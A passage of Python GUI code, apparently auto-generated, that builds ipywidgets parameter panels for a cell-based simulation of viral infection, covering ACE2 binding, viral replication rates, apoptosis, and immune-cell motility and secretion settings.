box42 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text3 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text3]
box43 = Box(children=row, layout=box_layout)
name_btn = Button(description='secretion_target', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float38 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless substrate concentration', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float38, units_btn]
box44 = Box(children=row, layout=box_layout)
# -------------------------
div_row7 = Button(description='phenotype:molecular', disabled=True, layout=divider_button_layout)
div_row7.style.button_color = 'orange'
# ================== <custom_data>, if present ==================
div_row8 = Button(description='Custom Data',disabled=True, layout=divider_button_layout)
div_row8.style.button_color = 'cyan'
name_btn = Button(description='virion', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float39 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='virions', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='endocytosed virions', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float39, units_btn, description_btn]
box45 = Box(children=row, layout=box_layout)
name_btn = Button(description='uncoated_virion', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float40 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='virions', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='uncoated endocytosed virions', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float40, units_btn, description_btn]
box46 = Box(children=row, layout=box_layout)
name_btn = Button(description='viral_RNA', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float41 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='RNA', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='total (functional) viral RNA copies', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float41, units_btn, description_btn]
box47 = Box(children=row, layout=box_layout)
name_btn = Button(description='viral_protein', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float42 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='protein', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='total assembled sets of viral protein', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float42, units_btn, description_btn]
box48 = Box(children=row, layout=box_layout)
name_btn = Button(description='assembled_virion', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float43 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='total assembled virions', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float43, units_btn, description_btn]
box49 = Box(children=row, layout=box_layout)
name_btn = Button(description='virion_uncoating_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float44 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate at which an internalized virion is uncoated', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float44, units_btn, description_btn]
box50 = Box(children=row, layout=box_layout)
name_btn = Button(description='uncoated_to_RNA_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float45 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='rate at which uncoated virion makes its mRNA available', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float45, units_btn, description_btn]
box51 = Box(children=row, layout=box_layout)
name_btn = Button(description='protein_synthesis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float46 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate at mRNA creates complete set of proteins', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float46, units_btn, description_btn]
box52 = Box(children=row, layout=box_layout)
name_btn = Button(description='virion_assembly_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float47 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='rate at which viral proteins are assembled into complete virion', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float47, units_btn, description_btn]
box53 = Box(children=row, layout=box_layout)
name_btn = Button(description='virion_export_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float48 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate at which a virion is exported from a live cell', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float48, units_btn, description_btn]
box54 = Box(children=row, layout=box_layout)
name_btn = Button(description='unbound_external_ACE2', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float49 = FloatText(value='1000', step='100', style=style, layout=widget_layout)
units_btn = Button(description='receptors', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='initial number of unbound ACE2 receptors on surface', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float49, units_btn, description_btn]
box55 = Box(children=row, layout=box_layout)
name_btn = Button(description='bound_external_ACE2', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float50 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='receptors', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='initial number of bound ACE2 receptors on surface', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float50, units_btn, description_btn]
box56 = Box(children=row, layout=box_layout)
name_btn = Button(description='unbound_internal_ACE2', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float51 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='receptors', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='initial number of internalized unbound ACE2 receptors', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float51, units_btn, description_btn]
box57 = Box(children=row, layout=box_layout)
name_btn = Button(description='bound_internal_ACE2', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float52 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='receptors', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='initial number of internalized bound ACE2 receptors', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float52, units_btn, description_btn]
box58 = Box(children=row, layout=box_layout)
name_btn = Button(description='ACE2_binding_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float53 = FloatText(value='0.001', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='ACE2 receptor-virus binding rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float53, units_btn, description_btn]
box59 = Box(children=row, layout=box_layout)
name_btn = Button(description='ACE2_endocytosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float54 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='ACE2 receptor-virus endocytosis rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float54, units_btn, description_btn]
box60 = Box(children=row, layout=box_layout)
name_btn = Button(description='ACE2_cargo_release_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float55 = FloatText(value='0.001', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='ACE2 receptor-virus cargo release rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float55, units_btn, description_btn]
box61 = Box(children=row, layout=box_layout)
name_btn = Button(description='ACE2_recycling_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float56 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='ACE2 receptor recycling rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float56, units_btn, description_btn]
box62 = Box(children=row, layout=box_layout)
name_btn = Button(description='max_infected_apoptosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float57 = FloatText(value='0.001', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='maximum rate of cell apoptosis due to viral infection', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float57, units_btn, description_btn]
box63 = Box(children=row, layout=box_layout)
name_btn = Button(description='max_apoptosis_half_max', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float58 = FloatText(value='250', step='10', style=style, layout=widget_layout)
units_btn = Button(description='virion', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='viral load at which cells reach half max apoptosis rate', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float58, units_btn, description_btn]
box64 = Box(children=row, layout=box_layout)
name_btn = Button(description='apoptosis_hill_power', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float59 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='none', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='Hill power for viral load apoptosis response', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float59, units_btn, description_btn]
box65 = Box(children=row, layout=box_layout)
name_btn = Button(description='virus_fraction_released_at_death', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float60 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='none', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='fraction of internal virus released at cell death', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float60, units_btn, description_btn]
box66 = Box(children=row, layout=box_layout)
name_btn = Button(description='infected_cell_chemokine_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float61 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='max rate that infected cells secrete chemokine', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float61, units_btn, description_btn]
box67 = Box(children=row, layout=box_layout)
name_btn = Button(description='debris_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float62 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate that dead cells release debris', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float62, units_btn, description_btn]
box68 = Box(children=row, layout=box_layout)
name_btn = Button(description='infected_cell_chemokine_secretion_activated', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float63 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='none', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='used internally to track activation of chemokine secretion', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float63, units_btn, description_btn]
box69 = Box(children=row, layout=box_layout)
name_btn = Button(description='TCell_contact_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float64 = FloatText(value='0.0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='tracks total contact time with CD8 T cells', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float64, units_btn, description_btn]
box70 = Box(children=row, layout=box_layout)
name_btn = Button(description='cell_attachment_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float65 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='the rate at which the cell attaches to cells in contact', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float65, units_btn, description_btn]
box71 = Box(children=row, layout=box_layout)
name_btn = Button(description='cell_attachment_lifetime', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float66 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='the mean duration of a cell-cell attachment', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float66, units_btn, description_btn]
box72 = Box(children=row, layout=box_layout)
name_btn = Button(description='TCell_contact_death_threshold', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float67 = FloatText(value='50', step='1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='threshold CD8 T cell contact time to trigger apoptosis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float67, units_btn, description_btn]
box73 = Box(children=row, layout=box_layout)
name_btn = Button(description='max_attachment_distance', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float68 = FloatText(value='15', step='1', style=style, layout=widget_layout)
units_btn = Button(description='micron', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float68, units_btn, description_btn]
box74 = Box(children=row, layout=box_layout)
name_btn = Button(description='elastic_attachment_coefficient', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float69 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='elastic coefficient for cell-cell attachment', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float69, units_btn, description_btn]
box75 = Box(children=row, layout=box_layout)
name_btn = Button(description='phagocytosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float70 = FloatText(value='0.167', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float70, units_btn, description_btn]
box76 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_debris_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float71 = FloatText(value='1.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='relative sensitivity to debris in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float71, units_btn, description_btn]
box77 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_chemokine_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float72 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='relative sensitivity to chemokine in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float72, units_btn, description_btn]
box78 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float73 = FloatText(value='0.4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='speed after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float73, units_btn, description_btn]
box79 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_cytokine_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float74 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate of secreting pro-inflamatory cytokine after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float74, units_btn, description_btn]
box80 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_immune_cell', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float75 = FloatText(value='0.0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='used internally to track activation state', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float75, units_btn, description_btn]
box81 = Box(children=row, layout=box_layout)
name_btn = Button(description='virus_expression_threshold', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float76 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='minimal quantity of virus to activate virus_expression node', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float76, units_btn, description_btn]
box82 = Box(children=row, layout=box_layout)
self.cell_def_vbox0 = VBox([
div_row1, box0, box1, box2, box3, div_row2, death_model1,box4, box5, box6, box7, box8, box9, box10, death_model2,box11, box12, box13, box14, box15, box16, box17, div_row3, box18, box19, box20, box21, box22, box23, box24, box25, box26, div_row4, box27, box28, box29, box30, box31, div_row5, box32,box33,box34,self.bool2,self.bool3,chemotaxis_btn,self.bool4,box35,box36,div_row6, box37,box38,box39,box40,box41,box42,box43,box44,div_row7, div_row8, box45,
box46,
box47,
box48,
box49,
box50,
box51,
box52,
box53,
box54,
box55,
box56,
box57,
box58,
box59,
box60,
box61,
box62,
box63,
box64,
box65,
box66,
box67,
box68,
box69,
box70,
box71,
box72,
box73,
box74,
box75,
box76,
box77,
box78,
box79,
box80,
box81,
box82,
])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox0)
# >>>>>>>>>>>>>>>>> <cell_definition> = lung epithelium
# -------------------------
div_row9 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row9.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float77 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float77, units_btn, ]
box83 = Box(children=row, layout=box_layout)
# -------------------------
div_row10 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row10.style.button_color = 'orange'
self.bool5 = Checkbox(description='enabled', value=False,layout=name_button_layout)
# -------------------------
div_row11 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row11.style.button_color = 'orange'
# -------------------------
div_row12 = Button(description='phenotype:intracellular (maboss)', disabled=True, layout=divider_button_layout)
div_row12.style.button_color = 'orange'
bnd_filename = Button(description='bnd_filename', disabled=True, layout=name_button_layout)
bnd_filename.style.button_color = 'lightgreen'
self.bnd_filenames[1] = Text(value='../data/boolean_network/epithelial_cell_2.bnd', style=style, layout=widget_layout)
row = [bnd_filename, self.bnd_filenames[1]]
box84 = Box(children=row, layout=box_layout)
cfg_filename = Button(description='cfg_filename', disabled=True, layout=name_button_layout)
cfg_filename.style.button_color = 'tan'
self.cfg_filenames[1] = Text(value='../data/boolean_network/epithelial_cell_2.cfg', style=style, layout=widget_layout)
row = [cfg_filename, self.cfg_filenames[1]]
box85 = Box(children=row, layout=box_layout)
time_step = Button(description='time_step', disabled=True, layout=name_button_layout)
time_step.style.button_color = 'lightgreen'
self.float78 = FloatText(value='12', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [time_step, self.float78, units_btn]
box86 = Box(children=row, layout=box_layout)
# ================== <custom_data>, if present ==================
self.cell_def_vbox1 = VBox([
div_row9, death_model1,box83, div_row10, self.bool5,div_row11, div_row12, box84,box85,box86, ])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox1)
# >>>>>>>>>>>>>>>>> <cell_definition> = immune
# -------------------------
div_row13 = Button(description='phenotype:mechanics', disabled=True, layout=divider_button_layout)
div_row13.style.button_color = 'orange'
name_btn = Button(description='cell_cell_adhesion_strength', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float79 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
time_step = [name_btn, self.float79, units_btn, ]
box87 = Box(children=time_step, layout=box_layout)
name_btn = Button(description='cell_cell_repulsion_strength', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float80 = FloatText(value='10', step='1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
time_step = [name_btn, self.float80, units_btn, ]
box88 = Box(children=time_step, layout=box_layout)
# -------------------------
div_row14 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row14.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float81 = FloatText(value='5e-4', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
time_step = [name_btn, self.float81, units_btn, ]
box89 = Box(children=time_step, layout=box_layout)
# -------------------------
div_row15 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row15.style.button_color = 'orange'
name_btn = Button(description='speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float82 = FloatText(value='4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float82, units_btn]
box90 = Box(children=row, layout=box_layout)
name_btn = Button(description='persistence_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float83 = FloatText(value='5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float83, units_btn]
box91 = Box(children=row, layout=box_layout)
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float84 = FloatText(value='0.70', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float84, units_btn]
box92 = Box(children=row, layout=box_layout)
self.bool6 = Checkbox(description='enabled', value=True,layout=name_button_layout)
self.bool7 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool8 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_substrate3 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate3]
box93 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_direction3 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction3]
box94 = Box(children=row, layout=box_layout)
# -------------------------
div_row16 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row16.style.button_color = 'orange'
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text4 = Text(value='pro-inflammatory cytokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text4]
box95 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float85 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float85, units_btn]
box96 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text5 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text5]
box97 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float86 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float86, units_btn]
box98 = Box(children=row, layout=box_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text6 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text6]
box99 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float87 = FloatText(value='0.1', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float87, units_btn]
box100 = Box(children=row, layout=box_layout)
# ================== <custom_data>, if present ==================
self.cell_def_vbox2 = VBox([
div_row13, box87, box88, div_row14, death_model1,box89, div_row15, box90,box91,box92,self.bool6,self.bool7,chemotaxis_btn,self.bool8,box93,box94,div_row16, box95,box96,box97,box98,box99,box100, ])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox2)
# >>>>>>>>>>>>>>>>> <cell_definition> = CD8 Tcell
# -------------------------
div_row17 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row17.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float88 = FloatText(value='2.8e-4', step='1e-05', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
time_step = [name_btn, self.float88, units_btn, ]
box101 = Box(children=time_step, layout=box_layout)
# -------------------------
div_row18 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row18.style.button_color = 'orange'
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float89 = FloatText(value='0.70', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float89, units_btn]
box102 = Box(children=row, layout=box_layout)
self.bool9 = Checkbox(description='enabled', value=True,layout=name_button_layout)
self.bool10 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
